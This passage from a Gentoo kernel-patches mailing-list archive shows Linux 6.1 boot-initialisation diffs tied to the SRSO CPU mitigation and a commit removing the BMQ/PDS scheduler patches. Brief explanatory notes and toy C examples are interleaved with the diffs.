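          }
          /* nr_slots > 0: the remainder goes to the frag_list skb;
           * nr_slots == 0 with an nskb allocated: kfree_skb(nskb). */
          printf("main skb frags=%d, spill frags=%d\n", main_frags, nr_slots);
          return 0;
  }
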
+diff --git a/include/asm-generic/bugs.h b/include/asm-generic/bugs.h
+deleted file mode 100644
+index 69021830f078d..0000000000000
+--- a/include/asm-generic/bugs.h
++++ /dev/null
+@@ -1,11 +0,0 @@
+-/* SPDX-License-Identifier: GPL-2.0 */
+-#ifndef __ASM_GENERIC_BUGS_H
+-#define __ASM_GENERIC_BUGS_H
+-/*
+- * This file is included by 'init/main.c' to check for
+- * architecture-dependent bugs.
+- */
+-
+-static inline void check_bugs(void) { }
+-
+-#endif	/* __ASM_GENERIC_BUGS_H */
+diff --git a/include/linux/cpu.h b/include/linux/cpu.h
+index 314802f98b9da..f98cfe9f188f5 100644
+--- a/include/linux/cpu.h
++++ b/include/linux/cpu.h
+@@ -70,6 +70,8 @@ extern ssize_t cpu_show_mmio_stale_data(struct device *dev,
+ 					char *buf);
+ extern ssize_t cpu_show_retbleed(struct device *dev,
+ 				 struct device_attribute *attr, char *buf);
++extern ssize_t cpu_show_spec_rstack_overflow(struct device *dev,
++					     struct device_attribute *attr, char *buf);
+ 
+ extern __printf(4, 5)
+ struct device *cpu_device_create(struct device *parent, void *drvdata,
+@@ -187,6 +189,12 @@ void arch_cpu_idle_enter(void);
+ void arch_cpu_idle_exit(void);
+ void arch_cpu_idle_dead(void);
+ 
++#ifdef CONFIG_ARCH_HAS_CPU_FINALIZE_INIT
++void arch_cpu_finalize_init(void);
++#else
++static inline void arch_cpu_finalize_init(void) { }
++#endif
++
+ int cpu_report_state(int cpu);
+ int cpu_check_up_prepare(int cpu);
+ void cpu_set_state_online(int cpu);
+diff --git a/include/linux/sched/task.h b/include/linux/sched/task.h
+index d6c48163c6def..357e0068497c1 100644
+--- a/include/linux/sched/task.h
++++ b/include/linux/sched/task.h
+@@ -65,6 +65,7 @@ extern void sched_dead(struct task_struct *p);
+ void __noreturn do_task_dead(void);
+ void __noreturn make_task_dead(int signr);
+ 
++extern void mm_cache_init(void);
+ extern void proc_caches_init(void);
+ 
+ extern void fork_init(void);
+@@ -90,7 +91,6 @@ extern void exit_itimers(struct task_struct *);
+ extern pid_t kernel_clone(struct kernel_clone_args *kargs);
+ struct task_struct *create_io_thread(int (*fn)(void *), void *arg, int node);
+ struct task_struct *fork_idle(int);
+-struct mm_struct *copy_init_mm(void);
+ extern pid_t kernel_thread(int (*fn)(void *), void *arg, unsigned long flags);
+ extern pid_t user_mode_thread(int (*fn)(void *), void *arg, unsigned long flags);
+ extern long kernel_wait4(pid_t, int __user *, int, struct rusage *);
+diff --git a/init/main.c b/init/main.c
+index aa21add5f7c54..fe378351e8a95 100644
+--- a/init/main.c
++++ b/init/main.c
+@@ -96,7 +96,6 @@
+ #include <linux/cache.h>
+ #include <linux/rodata_test.h>
+ #include <linux/jump_label.h>
+-#include <linux/mem_encrypt.h>
+ #include <linux/kcsan.h>
+ #include <linux/init_syscalls.h>
+ #include <linux/stackdepot.h>
+@@ -104,7 +103,6 @@
+ #include <net/net_namespace.h>
+ 
+ #include <asm/io.h>
+-#include <asm/bugs.h>
+ #include <asm/setup.h>
+ #include <asm/sections.h>
+ #include <asm/cacheflush.h>
+@@ -781,8 +779,6 @@ void __init __weak thread_stack_cache_init(void)
+ }
+ #endif
+ 
+-void __init __weak mem_encrypt_init(void) { }
+-
+ void __init __weak poking_init(void) { }
+ 
+ void __init __weak pgtable_cache_init(void) { }
+@@ -860,6 +856,7 @@ static void __init mm_init(void)
+ 	/* Should be run after espfix64 is set up. */
+ 	pti_init();
+ 	kmsan_init_runtime();
++	mm_cache_init();
+ }
+ 
+ #ifdef CONFIG_RANDOMIZE_KSTACK_OFFSET
+@@ -995,7 +992,7 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	sort_main_extable();
+ 	trap_init();
+ 	mm_init();
+-
++	poking_init();
+ 	ftrace_init();
+ 
+ 	/* trace_printk can be enabled here */
+@@ -1084,14 +1081,6 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	 */
+ 	locking_selftest();
+ 
+-	/*
+-	 * This needs to be called before any devices perform DMA
+-	 * operations that might use the SWIOTLB bounce buffers. It will
+-	 * mark the bounce buffers as decrypted so that their usage will
+-	 * not cause "plain-text" data to be decrypted when accessed.
+-	 */
+-	mem_encrypt_init();
+-
+ #ifdef CONFIG_BLK_DEV_INITRD
+ 	if (initrd_start && !initrd_below_start_ok &&
+ 	    page_to_pfn(virt_to_page((void *)initrd_start)) < min_low_pfn) {
+@@ -1108,6 +1097,9 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 		late_time_init();
+ 	sched_clock_init();
+ 	calibrate_delay();
++
++	arch_cpu_finalize_init();
++
+ 	pid_idr_init();
+ 	anon_vma_init();
+ #ifdef CONFIG_X86
+@@ -1134,9 +1126,6 @@ asmlinkage __visible void __init __no_sanitize_address start_kernel(void)
+ 	taskstats_init_early();
+ 	delayacct_init();
+ 
+-	poking_init();
+-	check_bugs();
+-
+ 	acpi_subsystem_init();
+ 	arch_post_acpi_subsys_init();
+ 	kcsan_init();
+diff --git a/kernel/fork.c b/kernel/fork.c
+index 6bb91fbbf73cc..41950ff90aa34 100644
+--- a/kernel/fork.c
++++ b/kernel/fork.c
+@@ -2600,11 +2600,6 @@ struct task_struct * __init fork_idle(int cpu)
+ 	return task;
+ }
+ 
+-struct mm_struct *copy_init_mm(void)
+-{
+-	return dup_mm(NULL, &init_mm);
+-}
+-
+ /*
+  * This is like kernel_clone(), but shaved down and tailored to just
+  * creating io_uring workers. It returns a created task, or an error pointer.
+@@ -3023,10 +3018,27 @@ static void sighand_ctor(void *data)
+ 	init_waitqueue_head(&sighand->signalfd_wqh);
+ }
+ 
+-void __init proc_caches_init(void)
++void __init mm_cache_init(void)
+ {
+ 	unsigned int mm_size;
+ 
++	/*
++	 * The mm_cpumask is located at the end of mm_struct, and is
++	 * dynamically sized based on the maximum CPU number this system
++	 * can have, taking hotplug into account (nr_cpu_ids).
++	 */
++	mm_size = sizeof(struct mm_struct) + cpumask_size();
++
++	mm_cachep = kmem_cache_create_usercopy("mm_struct",
++			mm_size, ARCH_MIN_MMSTRUCT_ALIGN,
++			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
++			offsetof(struct mm_struct, saved_auxv),
++			sizeof_field(struct mm_struct, saved_auxv),
++			NULL);
++}
++
++void __init proc_caches_init(void)
++{
+ 	sighand_cachep = kmem_cache_create("sighand_cache",
+ 			sizeof(struct sighand_struct), 0,
+ 			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_TYPESAFE_BY_RCU|
+@@ -3044,19 +3056,6 @@ void __init proc_caches_init(void)
+ 			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
+ 			NULL);
+ 
+-	/*
+-	 * The mm_cpumask is located at the end of mm_struct, and is
+-	 * dynamically sized based on the maximum CPU number this system
+-	 * can have, taking hotplug into account (nr_cpu_ids).
+-	 */
+-	mm_size = sizeof(struct mm_struct) + cpumask_size();
+-
+-	mm_cachep = kmem_cache_create_usercopy("mm_struct",
+-			mm_size, ARCH_MIN_MMSTRUCT_ALIGN,
+-			SLAB_HWCACHE_ALIGN|SLAB_PANIC|SLAB_ACCOUNT,
+-			offsetof(struct mm_struct, saved_auxv),
+-			sizeof_field(struct mm_struct, saved_auxv),
+-			NULL);
+ 	vm_area_cachep = KMEM_CACHE(vm_area_struct, SLAB_PANIC|SLAB_ACCOUNT);
+ 	mmap_init();
+ 	nsproxy_cache_init();
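
The mm_cache_init() carved out above has to size the slab at runtime because
mm_cpumask sits at the end of mm_struct and scales with nr_cpu_ids. The same
trailing-bitmap pattern in plain C, as a sketch with invented names:

  #include <stdio.h>
  #include <stdlib.h>

  struct toy_mm {
          long mm_users;                 /* ... fixed-size fields ... */
          unsigned long cpu_bitmap[];    /* flexible array, like mm_cpumask */
  };

  int main(void)
  {
          int nr_cpu_ids = 8;    /* the kernel derives this from hotplug info */
          size_t bits_per_long = 8 * sizeof(long);
          size_t mask_bytes = (nr_cpu_ids + bits_per_long - 1) / bits_per_long
                              * sizeof(long);
          size_t mm_size = sizeof(struct toy_mm) + mask_bytes;
          struct toy_mm *mm = calloc(1, mm_size);

          printf("allocation size: %zu bytes\n", mm_size);
          free(mm);
          return 0;
  }
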
+diff --git a/tools/arch/x86/include/asm/cpufeatures.h b/tools/arch/x86/include/asm/cpufeatures.h
+index b71f4f2ecdd57..9ecc62861194e 100644
+--- a/tools/arch/x86/include/asm/cpufeatures.h
++++ b/tools/arch/x86/include/asm/cpufeatures.h
+@@ -14,7 +14,7 @@
+  * Defines x86 CPU feature bits
+  */
+ #define NCAPINTS			20	   /* N 32-bit words worth of info */
+-#define NBUGINTS			1	   /* N 32-bit bug flags */
++#define NBUGINTS			2	   /* N 32-bit bug flags */
+ 
+ /*
+  * Note: If the comment begins with a quoted string, that string is used
+diff --git a/tools/objtool/arch/x86/decode.c b/tools/objtool/arch/x86/decode.c
+index 1c253b4b7ce00..a60c5efe34b36 100644
+--- a/tools/objtool/arch/x86/decode.c
++++ b/tools/objtool/arch/x86/decode.c
+@@ -796,5 +796,8 @@ bool arch_is_retpoline(struct symbol *sym)
+ 
+ bool arch_is_rethunk(struct symbol *sym)
+ {
+-	return !strcmp(sym->name, "__x86_return_thunk");
++	return !strcmp(sym->name, "__x86_return_thunk") ||
++	       !strcmp(sym->name, "srso_untrain_ret") ||
++	       !strcmp(sym->name, "srso_safe_ret") ||
++	       !strcmp(sym->name, "__ret");
+ }


^ permalink raw reply related	[flat|nested] 161+ messages in thread
* [gentoo-commits] proj/linux-patches:6.1 commit in: /
@ 2023-08-03 11:54 Mike Pagano
  0 siblings, 0 replies; 161+ messages in thread
From: Mike Pagano @ 2023-08-03 11:54 UTC (permalink / raw
  To: gentoo-commits

commit:     874091cbd6a9ed3a2e6b82d58d43242931b17e5e
Author:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
AuthorDate: Thu Aug  3 11:53:58 2023 +0000
Commit:     Mike Pagano <mpagano <AT> gentoo <DOT> org>
CommitDate: Thu Aug  3 11:53:58 2023 +0000
URL:        https://gitweb.gentoo.org/proj/linux-patches.git/commit/?id=874091cb

Remove BMQ for incompatibilities

Signed-off-by: Mike Pagano <mpagano <AT> gentoo.org>

 0000_README                                        |    12 -
 ...MQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch | 10154 -------------------
 5021_BMQ-and-PDS-gentoo-defaults.patch             |    13 -
 5022_BMQ-and-PDS-remove-psi-support.patch          |    94 -
 4 files changed, 10273 deletions(-)

diff --git a/0000_README b/0000_README
index a70a1aed..c3798828 100644
--- a/0000_README
+++ b/0000_README
@@ -262,15 +262,3 @@ Desc:   Kernel fs for Linux that provides easier uid/gid-shifting for containers
 Patch:  5010_enable-cpu-optimizations-universal.patch
 From:   https://github.com/graysky2/kernel_compiler_patch
 Desc:   Kernel >= 5.15 patch enables gcc = v11.1+ optimizations for additional CPUs.
-
-Patch:  5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
-From:   https://github.com/Frogging-Family/linux-tkg https://gitlab.com/alfredchen/projectc
-Desc:   BMQ(BitMap Queue) Scheduler. A new CPU scheduler developed from PDS(incld). Inspired by the scheduler in zircon.
-
-Patch:  5021_BMQ-and-PDS-gentoo-defaults.patch
-From:   https://gitweb.gentoo.org/proj/linux-patches.git/
-Desc:   Set defaults for BMQ. Add archs as people test, default to N
-
-Patch:  5022_BMQ-and-PDS-remove-psi-support.patch
-From:   https://gitweb.gentoo.org/proj/linux-patches.git/
-Desc:   Sched/alt: Remove psi support 

diff --git a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch b/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
deleted file mode 100644
index 7c2a77d3..00000000
--- a/5020_BMQ-and-PDS-io-scheduler-v6.1-r4-linux-tkg.patch
+++ /dev/null
@@ -1,10154 +0,0 @@
-diff --git a/Documentation/admin-guide/kernel-parameters.txt b/Documentation/admin-guide/kernel-parameters.txt
-index 42af9ca0127e..31747ec54f9d 100644
---- a/Documentation/admin-guide/kernel-parameters.txt
-+++ b/Documentation/admin-guide/kernel-parameters.txt
-@@ -5406,6 +5406,12 @@
- 	sa1100ir	[NET]
- 			See drivers/net/irda/sa1100_ir.c.
- 
-+	sched_timeslice=
-+			[KNL] Time slice in ms for Project C BMQ/PDS scheduler.
-+			Format: integer 2, 4
-+			Default: 4
-+			See Documentation/scheduler/sched-BMQ.txt
-+
- 	sched_verbose	[KNL] Enables verbose scheduler debug messages.
- 
- 	schedstats=	[KNL,X86] Enable or disable scheduled statistics.
-diff --git a/Documentation/admin-guide/sysctl/kernel.rst b/Documentation/admin-guide/sysctl/kernel.rst
-index 98d1b198b2b4..d7c78a107f93 100644
---- a/Documentation/admin-guide/sysctl/kernel.rst
-+++ b/Documentation/admin-guide/sysctl/kernel.rst
-@@ -1552,3 +1552,13 @@ is 10 seconds.
- 
- The softlockup threshold is (``2 * watchdog_thresh``). Setting this
- tunable to zero will disable lockup detection altogether.
-+
-+yield_type:
-+===========
-+
-+BMQ/PDS CPU scheduler only. This determines what type of yield a call
-+to sched_yield() will perform.
-+
-+  0 - No yield.
-+  1 - Deboost and requeue task. (default)
-+  2 - Set run queue skip task.
-diff --git a/Documentation/scheduler/sched-BMQ.txt b/Documentation/scheduler/sched-BMQ.txt
-new file mode 100644
-index 000000000000..05c84eec0f31
---- /dev/null
-+++ b/Documentation/scheduler/sched-BMQ.txt
-@@ -0,0 +1,110 @@
-+                         BitMap queue CPU Scheduler
-+                         --------------------------
-+
-+CONTENT
-+========
-+
-+ Background
-+ Design
-+   Overview
-+   Task policy
-+   Priority management
-+   BitMap Queue
-+   CPU Assignment and Migration
-+
-+
-+Background
-+==========
-+
-+BitMap Queue CPU scheduler, referred to as BMQ from here on, is an evolution
-+of the previous Priority and Deadline based Skiplist multiple queue scheduler
-+(PDS), and is inspired by the Zircon scheduler. Its goal is to keep the
-+scheduler code simple while remaining efficient and scalable for interactive
-+tasks such as desktop use, movie playback and gaming.
-+
-+Design
-+======
-+
-+Overview
-+--------
-+
-+BMQ uses a per-CPU run queue design: each (logical) CPU has its own run queue,
-+and each CPU is responsible for scheduling the tasks that are put into its
-+run queue.
-+
-+The run queue is a set of priority queues. Note that, as data structures,
-+these queues are FIFO queues for non-rt tasks and priority queues for rt
-+tasks. See BitMap Queue below for details. BMQ is optimized for non-rt tasks,
-+since most applications are non-rt tasks. Whether a queue is FIFO or
-+priority, each queue is an ordered list of runnable tasks awaiting execution
-+and the data structures are the same. When it is time for a new task to run,
-+the scheduler simply looks for the lowest numbered queue that contains a task
-+and runs the first task from the head of that queue. The per-CPU idle task is
-+also in the run queue, so the scheduler can always find a task to run from
-+its run queue.
-+
-+Each task is assigned the same timeslice (default 4ms) when it is picked to
-+start running. A task is reinserted at the end of the appropriate priority
-+queue when it uses up its whole timeslice. When the scheduler selects a new
-+task from the priority queue, it sets the CPU's preemption timer for the
-+remainder of the previous timeslice. When that timer fires, the scheduler
-+stops executing that task, selects another task and starts over again.
-+
-+If a task blocks waiting for a shared resource then it's taken out of its
-+priority queue and is placed in a wait queue for the shared resource. When it
-+is unblocked it will be reinserted in the appropriate priority queue of an
-+eligible CPU.
-+
-+Task policy
-+-----------
-+
-+BMQ supports the DEADLINE, FIFO, RR, NORMAL, BATCH and IDLE task policies,
-+like the mainline CFS scheduler. But BMQ is heavily optimized for non-rt
-+tasks, that is, NORMAL/BATCH/IDLE policy tasks. Below are the implementation
-+details of each policy.
-+
-+DEADLINE
-+	It is squashed as priority 0 FIFO task.
-+
-+FIFO/RR
-+	All RT tasks share one single priority queue in the BMQ run queue design.
-+The complexity of the insert operation is O(n). BMQ is not designed for
-+systems that run mostly rt policy tasks.
-+
-+NORMAL/BATCH/IDLE
-+	BATCH and IDLE tasks are treated as the same policy. They compete for CPU
-+with NORMAL policy tasks, but they just don't boost. To control the priority
-+of NORMAL/BATCH/IDLE tasks, simply use the nice level.
-+
-+ISO
-+	ISO policy is not supported in BMQ. Please use nice level -20 NORMAL policy
-+task instead.
-+
-+Priority management
-+-------------------
-+
-+RT tasks have priorities from 0-99. For non-rt tasks, there are three
-+different factors used to determine the effective priority of a task, the
-+effective priority being what is used to determine which queue it will be in.
-+
-+The first factor is simply the task's static priority, which is assigned from
-+the task's nice level: [-20, 19] from userland's point of view and [0, 39]
-+internally.
-+
-+The second factor is the priority boost. This is a value bounded within
-+[-MAX_PRIORITY_ADJ, MAX_PRIORITY_ADJ] used to offset the base priority; it is
-+modified in the following cases:
-+
-+* When a thread has used up its entire timeslice, its boost is always
-+deboosted by increasing it by one.
-+* When a thread gives up cpu control (voluntarily or not) to reschedule, and
-+its switch-in time (time since it last switched in and ran) is below the
-+threshold based on its priority boost, its boost is boosted by decreasing it
-+by one, but it is capped at 0 (won't go negative).
-+
-+The intent in this system is to ensure that interactive threads are serviced
-+quickly. These are usually the threads that interact directly with the user
-+and cause user-perceivable latency. These threads usually do little work and
-+spend most of their time blocked awaiting another user event. So they get the
-+priority boost from unblocking while background threads that do most of the
-+processing receive the priority penalty for using their entire timeslice.
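
The selection rule described in the Overview above, take the lowest numbered
non-empty queue and run the task at its head, reduces to a find-first-set
over a bitmap. A toy model of it, not the BMQ code itself and with all names
invented:

  #include <stdio.h>

  #define NR_PRIOS 64

  struct toy_rq {
          unsigned long long bitmap;     /* bit n set => queue n is non-empty */
          const char *head[NR_PRIOS];    /* head task of each priority queue */
  };

  static const char *pick_next(const struct toy_rq *rq)
  {
          /* The per-CPU idle task keeps the last queue non-empty, so a
           * task is always found, as the Overview states. */
          int prio = __builtin_ffsll(rq->bitmap) - 1;

          return rq->head[prio];
  }

  int main(void)
  {
          struct toy_rq rq = { 0 };

          rq.bitmap |= 1ULL << (NR_PRIOS - 1);
          rq.head[NR_PRIOS - 1] = "idle";
          rq.bitmap |= 1ULL << 10;
          rq.head[10] = "editor";

          printf("next: %s\n", pick_next(&rq));    /* prints "editor" */
          return 0;
  }
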
-diff --git a/fs/proc/base.c b/fs/proc/base.c
-index 9e479d7d202b..2a8530021b23 100644
---- a/fs/proc/base.c
-+++ b/fs/proc/base.c
-@@ -479,7 +479,7 @@ static int proc_pid_schedstat(struct seq_file *m, struct pid_namespace *ns,
- 		seq_puts(m, "0 0 0\n");
- 	else
- 		seq_printf(m, "%llu %llu %lu\n",
--		   (unsigned long long)task->se.sum_exec_runtime,
-+		   (unsigned long long)tsk_seruntime(task),
- 		   (unsigned long long)task->sched_info.run_delay,
- 		   task->sched_info.pcount);
- 
-diff --git a/include/asm-generic/resource.h b/include/asm-generic/resource.h
-index 8874f681b056..59eb72bf7d5f 100644
---- a/include/asm-generic/resource.h
-+++ b/include/asm-generic/resource.h
-@@ -23,7 +23,7 @@
- 	[RLIMIT_LOCKS]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- 	[RLIMIT_SIGPENDING]	= { 		0,	       0 },	\
- 	[RLIMIT_MSGQUEUE]	= {   MQ_BYTES_MAX,   MQ_BYTES_MAX },	\
--	[RLIMIT_NICE]		= { 0, 0 },				\
-+	[RLIMIT_NICE]		= { 30, 30 },				\
- 	[RLIMIT_RTPRIO]		= { 0, 0 },				\
- 	[RLIMIT_RTTIME]		= {  RLIM_INFINITY,  RLIM_INFINITY },	\
- }
-diff --git a/include/linux/sched.h b/include/linux/sched.h
-index ffb6eb55cd13..2e730a59caa2 100644
---- a/include/linux/sched.h
-+++ b/include/linux/sched.h
-@@ -762,8 +762,14 @@ struct task_struct {
- 	unsigned int			ptrace;
- 
- #ifdef CONFIG_SMP
--	int				on_cpu;
- 	struct __call_single_node	wake_entry;
-+#endif
-+#if defined(CONFIG_SMP) || defined(CONFIG_SCHED_ALT)
-+	int				on_cpu;
-+#endif
-+
-+#ifdef CONFIG_SMP
-+#ifndef CONFIG_SCHED_ALT
- 	unsigned int			wakee_flips;
- 	unsigned long			wakee_flip_decay_ts;
- 	struct task_struct		*last_wakee;
-@@ -777,6 +783,7 @@ struct task_struct {
- 	 */
- 	int				recent_used_cpu;
- 	int				wake_cpu;
-+#endif /* !CONFIG_SCHED_ALT */
- #endif
- 	int				on_rq;
- 
-@@ -785,6 +792,20 @@ struct task_struct {
- 	int				normal_prio;
- 	unsigned int			rt_priority;
- 
-+#ifdef CONFIG_SCHED_ALT
-+	u64				last_ran;
-+	s64				time_slice;
-+	int				sq_idx;
-+	struct list_head		sq_node;
-+#ifdef CONFIG_SCHED_BMQ
-+	int				boost_prio;
-+#endif /* CONFIG_SCHED_BMQ */
-+#ifdef CONFIG_SCHED_PDS
-+	u64				deadline;
-+#endif /* CONFIG_SCHED_PDS */
-+	/* sched_clock time spent running */
-+	u64				sched_time;
-+#else /* !CONFIG_SCHED_ALT */
- 	struct sched_entity		se;
- 	struct sched_rt_entity		rt;
- 	struct sched_dl_entity		dl;
-@@ -795,6 +816,7 @@ struct task_struct {
- 	unsigned long			core_cookie;
- 	unsigned int			core_occupation;
- #endif
-+#endif /* !CONFIG_SCHED_ALT */
- 
- #ifdef CONFIG_CGROUP_SCHED
- 	struct task_group		*sched_task_group;
-@@ -1545,6 +1567,15 @@ struct task_struct {
- 	 */
- };
- 
-+#ifdef CONFIG_SCHED_ALT
-+#define tsk_seruntime(t)		((t)->sched_time)
-+/* replace the uncertain rt_timeout with 0UL */
-+#define tsk_rttimeout(t)		(0UL)
-+#else /* CFS */
-+#define tsk_seruntime(t)	((t)->se.sum_exec_runtime)
-+#define tsk_rttimeout(t)	((t)->rt.timeout)
-+#endif /* !CONFIG_SCHED_ALT */
-+
- static inline struct pid *task_pid(struct task_struct *task)
- {
- 	return task->thread_pid;
-diff --git a/include/linux/sched/deadline.h b/include/linux/sched/deadline.h
-index 7c83d4d5a971..fa30f98cb2be 100644
---- a/include/linux/sched/deadline.h
-+++ b/include/linux/sched/deadline.h
-@@ -1,5 +1,24 @@
- /* SPDX-License-Identifier: GPL-2.0 */
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+static inline int dl_task(struct task_struct *p)
-+{
-+	return 0;
-+}
-+
-+#ifdef CONFIG_SCHED_BMQ
-+#define __tsk_deadline(p)	(0UL)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define __tsk_deadline(p)	((((u64) ((p)->prio))<<56) | (p)->deadline)
-+#endif
-+
-+#else
-+
-+#define __tsk_deadline(p)	((p)->dl.deadline)
-+
- /*
-  * SCHED_DEADLINE tasks has negative priorities, reflecting
-  * SCHED_DEADLINE tasks have negative priorities, reflecting
-@@ -21,6 +40,7 @@ static inline int dl_task(struct task_struct *p)
- {
- 	return dl_prio(p->prio);
- }
-+#endif /* CONFIG_SCHED_ALT */
- 
- static inline bool dl_time_before(u64 a, u64 b)
- {
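
The PDS variant of __tsk_deadline above packs the task's priority into bits
63..56 of a u64 in front of the deadline, so one unsigned comparison orders
waiters by priority first and deadline second; the rt_mutex changes later in
this patch compare exactly these packed values. A sketch of the ordering
property, assuming deadlines fit in the low 56 bits:

  #include <assert.h>
  #include <stdint.h>
  #include <stdio.h>

  static uint64_t pack(uint64_t prio, uint64_t deadline)
  {
          return (prio << 56) | deadline;    /* mirrors the PDS __tsk_deadline */
  }

  int main(void)
  {
          /* A numerically lower prio wins regardless of deadline... */
          assert(pack(1, 900) < pack(2, 100));
          /* ...and equal prios fall back to the earlier deadline. */
          assert(pack(2, 100) < pack(2, 200));
          puts("ordering holds");
          return 0;
  }
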
-diff --git a/include/linux/sched/prio.h b/include/linux/sched/prio.h
-index ab83d85e1183..6af9ae681116 100644
---- a/include/linux/sched/prio.h
-+++ b/include/linux/sched/prio.h
-@@ -18,6 +18,32 @@
- #define MAX_PRIO		(MAX_RT_PRIO + NICE_WIDTH)
- #define DEFAULT_PRIO		(MAX_RT_PRIO + NICE_WIDTH / 2)
- 
-+#ifdef CONFIG_SCHED_ALT
-+
-+/* Undefine MAX_PRIO and DEFAULT_PRIO */
-+#undef MAX_PRIO
-+#undef DEFAULT_PRIO
-+
-+/* +/- priority levels from the base priority */
-+#ifdef CONFIG_SCHED_BMQ
-+#define MAX_PRIORITY_ADJ	(7)
-+
-+#define MIN_NORMAL_PRIO		(MAX_RT_PRIO)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH)
-+#define DEFAULT_PRIO		(MIN_NORMAL_PRIO + NICE_WIDTH / 2)
-+#endif
-+
-+#ifdef CONFIG_SCHED_PDS
-+#define MAX_PRIORITY_ADJ	(0)
-+
-+#define MIN_NORMAL_PRIO		(128)
-+#define NORMAL_PRIO_NUM		(64)
-+#define MAX_PRIO		(MIN_NORMAL_PRIO + NORMAL_PRIO_NUM)
-+#define DEFAULT_PRIO		(MAX_PRIO - NICE_WIDTH / 2)
-+#endif
-+
-+#endif /* CONFIG_SCHED_ALT */
-+
- /*
-  * Convert user-nice values [ -20 ... 0 ... 19 ]
-  * to static priority [ MAX_RT_PRIO..MAX_PRIO-1 ],
-diff --git a/include/linux/sched/rt.h b/include/linux/sched/rt.h
-index 994c25640e15..8c050a59ece1 100644
---- a/include/linux/sched/rt.h
-+++ b/include/linux/sched/rt.h
-@@ -24,8 +24,10 @@ static inline bool task_is_realtime(struct task_struct *tsk)
- 
- 	if (policy == SCHED_FIFO || policy == SCHED_RR)
- 		return true;
-+#ifndef CONFIG_SCHED_ALT
- 	if (policy == SCHED_DEADLINE)
- 		return true;
-+#endif
- 	return false;
- }
- 
-diff --git a/include/linux/sched/topology.h b/include/linux/sched/topology.h
-index 816df6cc444e..c8da08e18c91 100644
---- a/include/linux/sched/topology.h
-+++ b/include/linux/sched/topology.h
-@@ -234,7 +234,8 @@ static inline bool cpus_share_cache(int this_cpu, int that_cpu)
- 
- #endif	/* !CONFIG_SMP */
- 
--#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL)
-+#if defined(CONFIG_ENERGY_MODEL) && defined(CONFIG_CPU_FREQ_GOV_SCHEDUTIL) && \
-+	!defined(CONFIG_SCHED_ALT)
- extern void rebuild_sched_domains_energy(void);
- #else
- static inline void rebuild_sched_domains_energy(void)
-diff --git a/init/Kconfig b/init/Kconfig
-index 94125d3b6893..c87ba766d354 100644
---- a/init/Kconfig
-+++ b/init/Kconfig
-@@ -819,6 +819,7 @@ menu "Scheduler features"
- config UCLAMP_TASK
- 	bool "Enable utilization clamping for RT/FAIR tasks"
- 	depends on CPU_FREQ_GOV_SCHEDUTIL
-+	depends on !SCHED_ALT
- 	help
- 	  This feature enables the scheduler to track the clamped utilization
- 	  of each CPU based on RUNNABLE tasks scheduled on that CPU.
-@@ -865,6 +866,35 @@ config UCLAMP_BUCKETS_COUNT
- 
- 	  If in doubt, use the default value.
- 
-+menuconfig SCHED_ALT
-+	bool "Alternative CPU Schedulers"
-+	default y
-+	help
-+	  This feature enables alternative CPU schedulers.
-+
-+if SCHED_ALT
-+
-+choice
-+	prompt "Alternative CPU Scheduler"
-+	default SCHED_BMQ
-+
-+config SCHED_BMQ
-+	bool "BMQ CPU scheduler"
-+	help
-+	  The BitMap Queue CPU scheduler for excellent interactivity and
-+	  responsiveness on the desktop and solid scalability on normal
-+	  hardware and commodity servers.
-+
-+config SCHED_PDS
-+	bool "PDS CPU scheduler"
-+	help
-+	  The Priority and Deadline based Skip list multiple queue CPU
-+	  Scheduler.
-+
-+endchoice
-+
-+endif
-+
- endmenu
- 
- #
-@@ -918,6 +948,7 @@ config NUMA_BALANCING
- 	depends on ARCH_SUPPORTS_NUMA_BALANCING
- 	depends on !ARCH_WANT_NUMA_VARIABLE_LOCALITY
- 	depends on SMP && NUMA && MIGRATION && !PREEMPT_RT
-+	depends on !SCHED_ALT
- 	help
- 	  This option adds support for automatic NUMA aware memory/task placement.
- 	  The mechanism is quite primitive and is based on migrating memory when
-@@ -1015,6 +1046,7 @@ config FAIR_GROUP_SCHED
- 	depends on CGROUP_SCHED
- 	default CGROUP_SCHED
- 
-+if !SCHED_ALT
- config CFS_BANDWIDTH
- 	bool "CPU bandwidth provisioning for FAIR_GROUP_SCHED"
- 	depends on FAIR_GROUP_SCHED
-@@ -1037,6 +1069,7 @@ config RT_GROUP_SCHED
- 	  realtime bandwidth for them.
- 	  See Documentation/scheduler/sched-rt-group.rst for more information.
- 
-+endif #!SCHED_ALT
- endif #CGROUP_SCHED
- 
- config UCLAMP_TASK_GROUP
-@@ -1281,6 +1314,7 @@ config CHECKPOINT_RESTORE
- 
- config SCHED_AUTOGROUP
- 	bool "Automatic process group scheduling"
-+	depends on !SCHED_ALT
- 	select CGROUPS
- 	select CGROUP_SCHED
- 	select FAIR_GROUP_SCHED
-diff --git a/init/init_task.c b/init/init_task.c
-index ff6c4b9bfe6b..19e9c662d1a1 100644
---- a/init/init_task.c
-+++ b/init/init_task.c
-@@ -75,9 +75,15 @@ struct task_struct init_task
- 	.stack		= init_stack,
- 	.usage		= REFCOUNT_INIT(2),
- 	.flags		= PF_KTHREAD,
-+#ifdef CONFIG_SCHED_ALT
-+	.prio		= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+	.static_prio	= DEFAULT_PRIO,
-+	.normal_prio	= DEFAULT_PRIO + MAX_PRIORITY_ADJ,
-+#else
- 	.prio		= MAX_PRIO - 20,
- 	.static_prio	= MAX_PRIO - 20,
- 	.normal_prio	= MAX_PRIO - 20,
-+#endif
- 	.policy		= SCHED_NORMAL,
- 	.cpus_ptr	= &init_task.cpus_mask,
